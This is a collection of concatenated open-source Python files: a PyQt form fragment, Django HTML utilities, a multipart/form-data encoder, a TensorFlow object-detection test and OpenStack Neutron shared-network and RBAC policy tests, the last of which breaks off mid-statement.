sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditKey.sizePolicy().hasHeightForWidth())
self.lineEditKey.setSizePolicy(sizePolicy)
self.lineEditKey.setObjectName(_fromUtf8("lineEditKey"))
self.gridLayout.addWidget(self.lineEditKey, 5, 1, 1, 2)
self.label_21 = QtGui.QLabel(PIXPage)
self.label_21.setText(QtGui.QApplication.translate("PIXPage", "Serial:", None, QtGui.QApplication.UnicodeUTF8))
self.label_21.setObjectName(_fromUtf8("label_21"))
self.gridLayout.addWidget(self.label_21, 6, 0, 1, 1)
self.lineEditSerial = QtGui.QLineEdit(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditSerial.sizePolicy().hasHeightForWidth())
self.lineEditSerial.setSizePolicy(sizePolicy)
self.lineEditSerial.setObjectName(_fromUtf8("lineEditSerial"))
self.gridLayout.addWidget(self.lineEditSerial, 6, 1, 1, 2)
spacerItem = QtGui.QSpacerItem(20, 281, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 7, 1, 1, 1)
self.retranslateUi(PIXPage)
self.comboBoxNIC.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(PIXPage)
def retranslateUi(self, PIXPage):
pass
| gpl-2.0 |
isaac-philip/loolu | common/django/utils/html.py | 116 | 7418 | """HTML utilities suitable for global use."""
import re
import string
from django.utils.safestring import SafeData, mark_safe
from django.utils.encoding import force_unicode
from django.utils.functional import allow_lazy
from django.utils.http import urlquote
# Configuration for urlize() function.
LEADING_PUNCTUATION = ['(', '<', '&lt;']
TRAILING_PUNCTUATION = ['.', ',', ')', '>', '\n', '&gt;']
# List of possible strings used for bullets in bulleted lists.
DOTS = ['&middot;', '*', '\xe2\x80\xa2', '&#149;', '&bull;', '&#8226;']
unencoded_ampersands_re = re.compile(r'&(?!(\w+|#\d+);)')
word_split_re = re.compile(r'(\s+)')
punctuation_re = re.compile('^(?P<lead>(?:%s)*)(?P<middle>.*?)(?P<trail>(?:%s)*)$' % \
('|'.join([re.escape(x) for x in LEADING_PUNCTUATION]),
'|'.join([re.escape(x) for x in TRAILING_PUNCTUATION])))
simple_email_re = re.compile(r'^\S+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+$')
link_target_attribute_re = re.compile(r'(<a [^>]*?)target=[^\s>]+')
html_gunk_re = re.compile(r'(?:<br clear="all">|<i><\/i>|<b><\/b>|<em><\/em>|<strong><\/strong>|<\/?smallcaps>|<\/?uppercase>)', re.IGNORECASE)
hard_coded_bullets_re = re.compile(r'((?:<p>(?:%s).*?[a-zA-Z].*?</p>\s*)+)' % '|'.join([re.escape(x) for x in DOTS]), re.DOTALL)
trailing_empty_content_re = re.compile(r'(?:<p>(?:&nbsp;|\s|<br \/>)*?</p>\s*)+\Z')
del x # Temporary variable
def escape(html):
"""
Returns the given HTML with ampersands, quotes and angle brackets encoded.
"""
    return mark_safe(force_unicode(html).replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;').replace('"', '&quot;').replace("'", '&#39;'))
escape = allow_lazy(escape, unicode)
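# Example (added illustration, not in the original module):
#   escape(u'<b>"A & B"</b>') == u'&lt;b&gt;&quot;A &amp; B&quot;&lt;/b&gt;'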
def conditional_escape(html):
"""
Similar to escape(), except that it doesn't operate on pre-escaped strings.
"""
if isinstance(html, SafeData):
return html
else:
return escape(html)
def linebreaks(value, autoescape=False):
"""Converts newlines into <p> and <br />s."""
value = re.sub(r'\r\n|\r|\n', '\n', force_unicode(value)) # normalize newlines
paras = re.split('\n{2,}', value)
if autoescape:
paras = [u'<p>%s</p>' % escape(p).replace('\n', '<br />') for p in paras]
else:
paras = [u'<p>%s</p>' % p.replace('\n', '<br />') for p in paras]
return u'\n\n'.join(paras)
linebreaks = allow_lazy(linebreaks, unicode)
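# Example (added illustration, not in the original module):
#   linebreaks(u'Hello\nworld\n\nBye') ==
#       u'<p>Hello<br />world</p>\n\n<p>Bye</p>'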
def strip_tags(value):
"""Returns the given HTML with all tags stripped."""
return re.sub(r'<[^>]*?>', '', force_unicode(value))
strip_tags = allow_lazy(strip_tags)
def strip_spaces_between_tags(value):
"""Returns the given HTML with spaces between tags removed."""
return re.sub(r'>\s+<', '><', force_unicode(value))
strip_spaces_between_tags = allow_lazy(strip_spaces_between_tags, unicode)
def strip_entities(value):
"""Returns the given HTML with all entities (&something;) stripped."""
return re.sub(r'&(?:\w+|#\d+);', '', force_unicode(value))
strip_entities = allow_lazy(strip_entities, unicode)
def fix_ampersands(value):
"""Returns the given HTML with all unencoded ampersands encoded correctly."""
    return unencoded_ampersands_re.sub('&amp;', force_unicode(value))
fix_ampersands = allow_lazy(fix_ampersands, unicode)
def urlize(text, trim_url_limit=None, nofollow=False, autoescape=False):
"""
Converts any URLs in text into clickable links.
Works on http://, https://, www. links and links ending in .org, .net or
.com. Links can have trailing punctuation (periods, commas, close-parens)
and leading punctuation (opening parens) and it'll still do the right
thing.
If trim_url_limit is not None, the URLs in link text longer than this limit
    will be truncated to trim_url_limit-3 characters and appended with an ellipsis.
If nofollow is True, the URLs in link text will get a rel="nofollow"
attribute.
If autoescape is True, the link text and URLs will get autoescaped.
"""
trim_url = lambda x, limit=trim_url_limit: limit is not None and (len(x) > limit and ('%s...' % x[:max(0, limit - 3)])) or x
safe_input = isinstance(text, SafeData)
words = word_split_re.split(force_unicode(text))
nofollow_attr = nofollow and ' rel="nofollow"' or ''
for i, word in enumerate(words):
match = None
if '.' in word or '@' in word or ':' in word:
match = punctuation_re.match(word)
if match:
lead, middle, trail = match.groups()
# Make URL we want to point to.
url = None
if middle.startswith('http://') or middle.startswith('https://'):
url = urlquote(middle, safe='/&=:;#?+*')
elif middle.startswith('www.') or ('@' not in middle and \
middle and middle[0] in string.ascii_letters + string.digits and \
(middle.endswith('.org') or middle.endswith('.net') or middle.endswith('.com'))):
url = urlquote('http://%s' % middle, safe='/&=:;#?+*')
elif '@' in middle and not ':' in middle and simple_email_re.match(middle):
url = 'mailto:%s' % middle
nofollow_attr = ''
# Make link.
if url:
trimmed = trim_url(middle)
if autoescape and not safe_input:
lead, trail = escape(lead), escape(trail)
url, trimmed = escape(url), escape(trimmed)
middle = '<a href="%s"%s>%s</a>' % (url, nofollow_attr, trimmed)
words[i] = mark_safe('%s%s%s' % (lead, middle, trail))
else:
if safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
elif safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
return u''.join(words)
urlize = allow_lazy(urlize, unicode)
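# Usage sketch (added illustration, not in the original module):
#   >>> urlize(u'Visit www.example.com today.', nofollow=True)
#   u'Visit <a href="http://www.example.com" rel="nofollow">www.example.com</a> today.'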
def clean_html(text):
"""
Clean the given HTML. Specifically, do the following:
* Convert <b> and <i> to <strong> and <em>.
* Encode all ampersands correctly.
* Remove all "target" attributes from <a> tags.
* Remove extraneous HTML, such as presentational tags that open and
immediately close and <br clear="all">.
* Convert hard-coded bullets into HTML unordered lists.
        * Remove stuff like "<p>&nbsp;</p>", but only if it's at the
          bottom of the text.
"""
from django.utils.text import normalize_newlines
text = normalize_newlines(force_unicode(text))
text = re.sub(r'<(/?)\s*b\s*>', '<\\1strong>', text)
text = re.sub(r'<(/?)\s*i\s*>', '<\\1em>', text)
text = fix_ampersands(text)
# Remove all target="" attributes from <a> tags.
text = link_target_attribute_re.sub('\\1', text)
# Trim stupid HTML such as <br clear="all">.
text = html_gunk_re.sub('', text)
# Convert hard-coded bullets into HTML unordered lists.
def replace_p_tags(match):
s = match.group().replace('</p>', '</li>')
for d in DOTS:
s = s.replace('<p>%s' % d, '<li>')
return u'<ul>\n%s\n</ul>' % s
text = hard_coded_bullets_re.sub(replace_p_tags, text)
    # Remove stuff like "<p>&nbsp;</p>", but only if it's at the bottom
    # of the text.
text = trailing_empty_content_re.sub('', text)
return text
clean_html = allow_lazy(clean_html, unicode)
| mit |
mdornseif/huTools | huTools/http/poster_encode.py | 1 | 11992 | """multipart/form-data encoding module
This module provides functions that facilitate encoding name/value pairs
as multipart/form-data suitable for a HTTP POST or PUT request.
multipart/form-data is the standard way to upload files over HTTP"""
__all__ = ['gen_boundary', 'encode_and_quote', 'MultipartParam',
'encode_string', 'encode_file_header', 'get_body_size', 'get_headers',
'multipart_encode']
import mimetypes
import os
import re
import urllib
import uuid
def gen_boundary():
"""Returns a random string to use as the boundary for a message"""
return uuid.uuid4().hex
def encode_and_quote(data):
"""If ``data`` is unicode, return urllib.quote_plus(data.encode("utf-8"))
otherwise return urllib.quote_plus(data)"""
if data is None:
return None
if isinstance(data, unicode):
data = data.encode("utf-8")
return urllib.quote_plus(data)
def _strify(s):
"""If s is a unicode string, encode it to UTF-8 and return the results,
otherwise return str(s), or None if s is None"""
if s is None:
return None
if isinstance(s, unicode):
return s.encode("utf-8")
return str(s)
class MultipartParam(object):
"""Represents a single parameter in a multipart/form-data request
``name`` is the name of this parameter.
If ``value`` is set, it must be a string or unicode object to use as the
data for this parameter.
If ``filename`` is set, it is what to say that this parameter's filename
    is. Note that this does not have to be the actual filename of any local file.
If ``filetype`` is set, it is used as the Content-Type for this parameter.
If unset it defaults to "text/plain; charset=utf8"
If ``filesize`` is set, it specifies the length of the file ``fileobj``
If ``fileobj`` is set, it must be a file-like object that supports
.read().
    ``value`` and ``fileobj`` must not both be set; doing so will
    raise a ValueError.
If ``fileobj`` is set, and ``filesize`` is not specified, then
the file's size will be determined first by stat'ing ``fileobj``'s
file descriptor, and if that fails, by seeking to the end of the file,
    recording the current position as the size, and then seeking back to the
beginning of the file.
"""
def __init__(self, name, value=None, filename=None, filetype=None,
filesize=None, fileobj=None):
self.name = encode_and_quote(name)
self.value = _strify(value)
if filename is None:
self.filename = None
else:
if isinstance(filename, unicode):
# Encode with XML entities
self.filename = filename.encode("ascii", "xmlcharrefreplace")
else:
self.filename = str(filename)
self.filename = self.filename.encode("string_escape").\
replace('"', '\\"')
self.filetype = _strify(filetype)
self.filesize = filesize
self.fileobj = fileobj
if self.value is not None and self.fileobj is not None:
raise ValueError("Only one of value or fileobj may be specified")
if fileobj is not None and filesize is None:
# Try and determine the file size
try:
self.filesize = os.fstat(fileobj.fileno()).st_size
except (OSError, AttributeError):
try:
fileobj.seek(0, 2)
self.filesize = fileobj.tell()
fileobj.seek(0)
                except Exception:
raise ValueError("Could not determine filesize")
def __cmp__(self, other):
attrs = ['name', 'value', 'filename', 'filetype', 'filesize', 'fileobj']
myattrs = [getattr(self, a) for a in attrs]
oattrs = [getattr(other, a) for a in attrs]
return cmp(myattrs, oattrs)
@classmethod
def from_file(cls, paramname, filename):
"""Returns a new MultipartParam object constructed from the local
file at ``filename``.
``filesize`` is determined by os.path.getsize(``filename``)
``filetype`` is determined by mimetypes.guess_type(``filename``)[0]
``filename`` is set to os.path.basename(``filename``)
"""
return cls(paramname, filename=os.path.basename(filename),
filetype=mimetypes.guess_type(filename)[0],
filesize=os.path.getsize(filename),
fileobj=open(filename, "rb"))
@classmethod
def from_params(cls, params):
"""Returns a list of MultipartParam objects from a sequence of
name, value pairs, MultipartParam instances,
or from a mapping of names to values
The values may be strings or file objects."""
if hasattr(params, 'items'):
params = params.items()
retval = []
for item in params:
if isinstance(item, cls):
retval.append(item)
continue
name, value = item
if hasattr(value, 'read'):
# Looks like a file object
filename = getattr(value, 'name', None)
if filename is not None:
filetype = mimetypes.guess_type(filename)[0]
else:
filetype = None
retval.append(cls(name=name, filename=filename,
filetype=filetype, fileobj=value))
else:
retval.append(cls(name, value))
return retval
def encode_hdr(self, boundary):
"""Returns the header of the encoding of this parameter"""
boundary = encode_and_quote(boundary)
headers = ["--%s" % boundary]
if self.filename:
disposition = 'form-data; name="%s"; filename="%s"' % (self.name,
self.filename)
else:
disposition = 'form-data; name="%s"' % self.name
headers.append("Content-Disposition: %s" % disposition)
if self.filetype:
filetype = self.filetype
else:
filetype = "text/plain; charset=utf-8"
headers.append("Content-Type: %s" % filetype)
if self.filesize is not None:
headers.append("Content-Length: %i" % self.filesize)
else:
headers.append("Content-Length: %i" % len(self.value))
headers.append("")
headers.append("")
return "\r\n".join(headers)
def encode(self, boundary):
"""Returns the string encoding of this parameter"""
if self.value is None:
value = self.fileobj.read()
else:
value = self.value
if re.search("^--%s$" % re.escape(boundary), value, re.M):
raise ValueError("boundary found in encoded string")
return "%s%s\r\n" % (self.encode_hdr(boundary), value)
def iter_encode(self, boundary, blocksize=4096):
"""Yields the encoding of this parameter
If self.fileobj is set, then blocks of ``blocksize`` bytes are read and
yielded."""
if self.value is not None:
yield self.encode(boundary)
else:
yield self.encode_hdr(boundary)
last_block = ""
encoded_boundary = "--%s" % encode_and_quote(boundary)
boundary_exp = re.compile("^%s$" % re.escape(encoded_boundary),
re.M)
while True:
block = self.fileobj.read(blocksize)
if not block:
yield "\r\n"
break
last_block += block
if boundary_exp.search(last_block):
raise ValueError("boundary found in file data")
last_block = last_block[-len(encoded_boundary) - 2:]
yield block
def get_size(self, boundary):
"""Returns the size in bytes that this param will be when encoded
with the given boundary."""
if self.filesize is not None:
valuesize = self.filesize
else:
valuesize = len(self.value)
return len(self.encode_hdr(boundary)) + 2 + valuesize
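# Usage sketch (added illustration; 'photo.jpg' is a hypothetical local file):
#   param = MultipartParam.from_file('attachment', 'photo.jpg')
#   datagen, headers = multipart_encode([param])
#   body = ''.join(datagen)  # suitable for an HTTP POST body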
def encode_string(boundary, name, value):
"""Returns ``name`` and ``value`` encoded as a multipart/form-data
variable. ``boundary`` is the boundary string used throughout
a single request to separate variables."""
return MultipartParam(name, value).encode(boundary)
def encode_file_header(boundary, paramname, filesize, filename=None,
filetype=None):
"""Returns the leading data for a multipart/form-data field that contains
file data.
``boundary`` is the boundary string used throughout a single request to
separate variables.
``paramname`` is the name of the variable in this request.
``filesize`` is the size of the file data.
``filename`` if specified is the filename to give to this field. This
field is only useful to the server for determining the original filename.
``filetype`` if specified is the MIME type of this file.
The actual file data should be sent after this header has been sent.
"""
return MultipartParam(paramname, filesize=filesize, filename=filename,
filetype=filetype).encode_hdr(boundary)
def get_body_size(params, boundary):
"""Returns the number of bytes that the multipart/form-data encoding
of ``params`` will be."""
size = sum(p.get_size(boundary) for p in MultipartParam.from_params(params))
return size + len(boundary) + 6
def get_headers(params, boundary):
"""Returns a dictionary with Content-Type and Content-Length headers
for the multipart/form-data encoding of ``params``."""
headers = {}
boundary = urllib.quote_plus(boundary)
headers['Content-Type'] = "multipart/form-data; boundary=%s" % boundary
headers['Content-Length'] = get_body_size(params, boundary)
return headers
def multipart_encode(params, boundary=None):
"""Encode ``params`` as multipart/form-data.
``params`` should be a sequence of (name, value) pairs or MultipartParam
objects, or a mapping of names to values.
Values are either strings parameter values, or file-like objects to use as
the parameter value. The file-like objects must support .read() and either
.fileno() or both .seek() and .tell().
    If ``boundary`` is set, then it is used as the MIME boundary. Otherwise
a randomly generated boundary will be used. In either case, if the
boundary string appears in the parameter values a ValueError will be
raised.
Returns a tuple of `datagen`, `headers`, where `datagen` is a
generator that will yield blocks of data that make up the encoded
    parameters, and `headers` is a dictionary with the associated
Content-Type and Content-Length headers.
Examples:
>>> datagen, headers = multipart_encode( [("key", "value1"), ("key", "value2")] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> p = MultipartParam("key", "value2")
>>> datagen, headers = multipart_encode( [("key", "value1"), p] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> datagen, headers = multipart_encode( {"key": "value1"} )
>>> s = "".join(datagen)
>>> assert "value2" not in s and "value1" in s
"""
if boundary is None:
boundary = gen_boundary()
else:
boundary = urllib.quote_plus(boundary)
headers = get_headers(params, boundary)
params = MultipartParam.from_params(params)
def yielder():
"""generator function to yield multipart/form-data representation
of parameters"""
for param in params:
for block in param.iter_encode(boundary):
yield block
yield "--%s--\r\n" % boundary
return yielder(), headers
| bsd-3-clause |
alexgorban/models | research/object_detection/predictors/rfcn_box_predictor_test.py | 3 | 2917 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.predictors.rfcn_box_predictor."""
import numpy as np
import tensorflow as tf
from google.protobuf import text_format
from object_detection.builders import hyperparams_builder
from object_detection.predictors import rfcn_box_predictor as box_predictor
from object_detection.protos import hyperparams_pb2
from object_detection.utils import test_case
class RfcnBoxPredictorTest(test_case.TestCase):
def _build_arg_scope_with_conv_hyperparams(self):
conv_hyperparams = hyperparams_pb2.Hyperparams()
conv_hyperparams_text_proto = """
regularizer {
l2_regularizer {
}
}
initializer {
truncated_normal_initializer {
}
}
"""
text_format.Merge(conv_hyperparams_text_proto, conv_hyperparams)
return hyperparams_builder.build(conv_hyperparams, is_training=True)
def test_get_correct_box_encoding_and_class_prediction_shapes(self):
def graph_fn(image_features, proposal_boxes):
rfcn_box_predictor = box_predictor.RfcnBoxPredictor(
is_training=False,
num_classes=2,
conv_hyperparams_fn=self._build_arg_scope_with_conv_hyperparams(),
num_spatial_bins=[3, 3],
depth=4,
crop_size=[12, 12],
box_code_size=4
)
box_predictions = rfcn_box_predictor.predict(
[image_features], num_predictions_per_location=[1],
scope='BoxPredictor',
proposal_boxes=proposal_boxes)
box_encodings = tf.concat(
box_predictions[box_predictor.BOX_ENCODINGS], axis=1)
class_predictions_with_background = tf.concat(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1)
return (box_encodings, class_predictions_with_background)
image_features = np.random.rand(4, 8, 8, 64).astype(np.float32)
proposal_boxes = np.random.rand(4, 2, 4).astype(np.float32)
(box_encodings, class_predictions_with_background) = self.execute(
graph_fn, [image_features, proposal_boxes])
self.assertAllEqual(box_encodings.shape, [8, 1, 2, 4])
self.assertAllEqual(class_predictions_with_background.shape, [8, 1, 3])
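    # Shape sketch (added note): 4 images x 2 proposal boxes = 8 flattened
    # proposals; each yields 2 per-class box encodings of size 4, and class
    # scores for 2 classes + background = 3 columns.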
if __name__ == '__main__':
tf.test.main()
| apache-2.0 |
dims/neutron | neutron/tests/api/admin/test_shared_network_extension.py | 1 | 19631 | # Copyright 2015 Hewlett-Packard Development Company, L.P.
# Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from tempest import test
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
import testtools
from neutron.tests.api import base
class SharedNetworksTest(base.BaseAdminNetworkTest):
@classmethod
def resource_setup(cls):
super(SharedNetworksTest, cls).resource_setup()
cls.shared_network = cls.create_shared_network()
@test.idempotent_id('6661d219-b96d-4597-ad10-55766123421a')
def test_filtering_shared_networks(self):
# this test is necessary because the 'shared' column does not actually
# exist on networks so the filter function has to translate it into
# queries against the RBAC table
self.create_network()
self._check_shared_correct(
self.client.list_networks(shared=True)['networks'], True)
self._check_shared_correct(
self.admin_client.list_networks(shared=True)['networks'], True)
self._check_shared_correct(
self.client.list_networks(shared=False)['networks'], False)
self._check_shared_correct(
self.admin_client.list_networks(shared=False)['networks'], False)
def _check_shared_correct(self, items, shared):
self.assertNotEmpty(items)
self.assertTrue(all(n['shared'] == shared for n in items))
@test.idempotent_id('6661d219-b96d-4597-ad10-51672353421a')
def test_filtering_shared_subnets(self):
# shared subnets need to be tested because their shared status isn't
# visible as a regular API attribute and it's solely dependent on the
# parent network
reg = self.create_network()
priv = self.create_subnet(reg, client=self.client)
shared = self.create_subnet(self.shared_network,
client=self.admin_client)
self.assertIn(shared, self.client.list_subnets(shared=True)['subnets'])
self.assertIn(shared,
self.admin_client.list_subnets(shared=True)['subnets'])
self.assertNotIn(priv,
self.client.list_subnets(shared=True)['subnets'])
self.assertNotIn(priv,
self.admin_client.list_subnets(shared=True)['subnets'])
self.assertIn(priv, self.client.list_subnets(shared=False)['subnets'])
self.assertIn(priv,
self.admin_client.list_subnets(shared=False)['subnets'])
self.assertNotIn(shared,
self.client.list_subnets(shared=False)['subnets'])
self.assertNotIn(shared,
self.admin_client.list_subnets(shared=False)['subnets'])
@test.idempotent_id('6661d219-b96d-4597-ad10-55766ce4abf7')
def test_create_update_shared_network(self):
shared_network = self.create_shared_network()
net_id = shared_network['id']
self.assertEqual('ACTIVE', shared_network['status'])
self.assertIsNotNone(shared_network['id'])
self.assertTrue(self.shared_network['shared'])
new_name = "New_shared_network"
body = self.admin_client.update_network(net_id, name=new_name,
admin_state_up=False,
shared=False)
updated_net = body['network']
self.assertEqual(new_name, updated_net['name'])
self.assertFalse(updated_net['shared'])
self.assertFalse(updated_net['admin_state_up'])
@test.idempotent_id('9c31fabb-0181-464f-9ace-95144fe9ca77')
def test_create_port_shared_network_as_non_admin_tenant(self):
# create a port as non admin
body = self.client.create_port(network_id=self.shared_network['id'])
port = body['port']
self.addCleanup(self.admin_client.delete_port, port['id'])
# verify the tenant id of admin network and non admin port
self.assertNotEqual(self.shared_network['tenant_id'],
port['tenant_id'])
@test.idempotent_id('3e39c4a6-9caf-4710-88f1-d20073c6dd76')
def test_create_bulk_shared_network(self):
# Creates 2 networks in one request
net_nm = [data_utils.rand_name('network'),
data_utils.rand_name('network')]
body = self.admin_client.create_bulk_network(net_nm, shared=True)
created_networks = body['networks']
for net in created_networks:
self.addCleanup(self.admin_client.delete_network, net['id'])
self.assertIsNotNone(net['id'])
self.assertTrue(net['shared'])
def _list_shared_networks(self, user):
body = user.list_networks(shared=True)
networks_list = [net['id'] for net in body['networks']]
self.assertIn(self.shared_network['id'], networks_list)
self.assertTrue(self.shared_network['shared'])
@test.idempotent_id('a064a9fd-e02f-474a-8159-f828cd636a28')
def test_list_shared_networks(self):
# List the shared networks and confirm that
# shared network extension attribute is returned for those networks
# that are created as shared
self._list_shared_networks(self.admin_client)
self._list_shared_networks(self.client)
def _show_shared_network(self, user):
body = user.show_network(self.shared_network['id'])
show_shared_net = body['network']
self.assertEqual(self.shared_network['name'], show_shared_net['name'])
self.assertEqual(self.shared_network['id'], show_shared_net['id'])
self.assertTrue(show_shared_net['shared'])
@test.idempotent_id('e03c92a2-638d-4bfa-b50a-b1f66f087e58')
def test_show_shared_networks_attribute(self):
# Show a shared network and confirm that
# shared network extension attribute is returned.
self._show_shared_network(self.admin_client)
self._show_shared_network(self.client)
class AllowedAddressPairSharedNetworkTest(base.BaseAdminNetworkTest):
allowed_address_pairs = [{'ip_address': '1.1.1.1'}]
@classmethod
def skip_checks(cls):
super(AllowedAddressPairSharedNetworkTest, cls).skip_checks()
if not test.is_extension_enabled('allowed-address-pairs', 'network'):
msg = "Allowed Address Pairs extension not enabled."
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(AllowedAddressPairSharedNetworkTest, cls).resource_setup()
cls.network = cls.create_shared_network()
cls.create_subnet(cls.network, client=cls.admin_client)
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-ffffffff1fff')
def test_create_with_address_pair_blocked_on_other_network(self):
with testtools.ExpectedException(lib_exc.Forbidden):
self.create_port(self.network,
allowed_address_pairs=self.allowed_address_pairs)
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-ffffffff2fff')
def test_update_with_address_pair_blocked_on_other_network(self):
port = self.create_port(self.network)
with testtools.ExpectedException(lib_exc.Forbidden):
self.update_port(
port, allowed_address_pairs=self.allowed_address_pairs)
class RBACSharedNetworksTest(base.BaseAdminNetworkTest):
force_tenant_isolation = True
credentials = ['primary', 'alt', 'admin']
@classmethod
def resource_setup(cls):
super(RBACSharedNetworksTest, cls).resource_setup()
if not test.is_extension_enabled('rbac_policies', 'network'):
msg = "rbac extension not enabled."
raise cls.skipException(msg)
cls.client2 = cls.alt_manager.network_client
def _make_admin_net_and_subnet_shared_to_tenant_id(self, tenant_id):
net = self.admin_client.create_network(
name=data_utils.rand_name('test-network-'))['network']
self.addCleanup(self.admin_client.delete_network, net['id'])
subnet = self.create_subnet(net, client=self.admin_client)
# network is shared to first unprivileged client by default
pol = self.admin_client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=tenant_id
)['rbac_policy']
return {'network': net, 'subnet': subnet, 'policy': pol}
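    # Sketch of the policy payload returned above (added note; fields
    # abridged, values hypothetical):
    #   {'id': '<uuid>', 'object_type': 'network', 'object_id': net['id'],
    #    'action': 'access_as_shared', 'target_tenant': tenant_id,
    #    'tenant_id': '<admin tenant id>'}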
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff1fff')
def test_network_only_visible_to_policy_target(self):
net = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)['network']
self.client.show_network(net['id'])
with testtools.ExpectedException(lib_exc.NotFound):
# client2 has not been granted access
self.client2.show_network(net['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff2fff')
def test_subnet_on_network_only_visible_to_policy_target(self):
sub = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)['subnet']
self.client.show_subnet(sub['id'])
with testtools.ExpectedException(lib_exc.NotFound):
# client2 has not been granted access
self.client2.show_subnet(sub['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff2eee')
def test_policy_target_update(self):
res = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
# change to client2
update_res = self.admin_client.update_rbac_policy(
res['policy']['id'], target_tenant=self.client2.tenant_id)
self.assertEqual(self.client2.tenant_id,
update_res['rbac_policy']['target_tenant'])
# make sure everything else stayed the same
res['policy'].pop('target_tenant')
update_res['rbac_policy'].pop('target_tenant')
self.assertEqual(res['policy'], update_res['rbac_policy'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff3fff')
def test_port_presence_prevents_network_rbac_policy_deletion(self):
res = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
port = self.client.create_port(network_id=res['network']['id'])['port']
# a port on the network should prevent the deletion of a policy
# required for it to exist
with testtools.ExpectedException(lib_exc.Conflict):
self.admin_client.delete_rbac_policy(res['policy']['id'])
# a wildcard policy should allow the specific policy to be deleted
# since it allows the remaining port
wild = self.admin_client.create_rbac_policy(
object_type='network', object_id=res['network']['id'],
action='access_as_shared', target_tenant='*')['rbac_policy']
self.admin_client.delete_rbac_policy(res['policy']['id'])
        # now that the wildcard is the only policy remaining, it should be
        # subject to the same restriction
with testtools.ExpectedException(lib_exc.Conflict):
self.admin_client.delete_rbac_policy(wild['id'])
# similarly, we can't update the policy to a different tenant
with testtools.ExpectedException(lib_exc.Conflict):
self.admin_client.update_rbac_policy(
wild['id'], target_tenant=self.client2.tenant_id)
self.client.delete_port(port['id'])
# anchor is gone, delete should pass
self.admin_client.delete_rbac_policy(wild['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-beefbeefbeef')
def test_tenant_can_delete_port_on_own_network(self):
# TODO(kevinbenton): make adjustments to the db lookup to
# make this work.
msg = "Non-admin cannot currently delete other's ports."
raise self.skipException(msg)
# pylint: disable=unreachable
net = self.create_network() # owned by self.client
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
port = self.client2.create_port(network_id=net['id'])['port']
self.client.delete_port(port['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff4fff')
def test_regular_client_shares_to_another_regular_client(self):
net = self.create_network() # owned by self.client
with testtools.ExpectedException(lib_exc.NotFound):
self.client2.show_network(net['id'])
pol = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
self.client2.show_network(net['id'])
self.assertIn(pol['rbac_policy'],
self.client.list_rbac_policies()['rbac_policies'])
# ensure that 'client2' can't see the policy sharing the network to it
# because the policy belongs to 'client'
self.assertNotIn(pol['rbac_policy']['id'],
[p['id']
for p in self.client2.list_rbac_policies()['rbac_policies']])
@test.attr(type='smoke')
@test.idempotent_id('bf5052b8-b11e-407c-8e43-113447404d3e')
def test_filter_fields(self):
net = self.create_network()
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
field_args = (('id',), ('id', 'action'), ('object_type', 'object_id'),
('tenant_id', 'target_tenant'))
for fields in field_args:
res = self.client.list_rbac_policies(fields=fields)
self.assertEqual(set(fields), set(res['rbac_policies'][0].keys()))
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff5fff')
def test_policy_show(self):
res = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
p1 = res['policy']
p2 = self.admin_client.create_rbac_policy(
object_type='network', object_id=res['network']['id'],
action='access_as_shared',
target_tenant='*')['rbac_policy']
self.assertEqual(
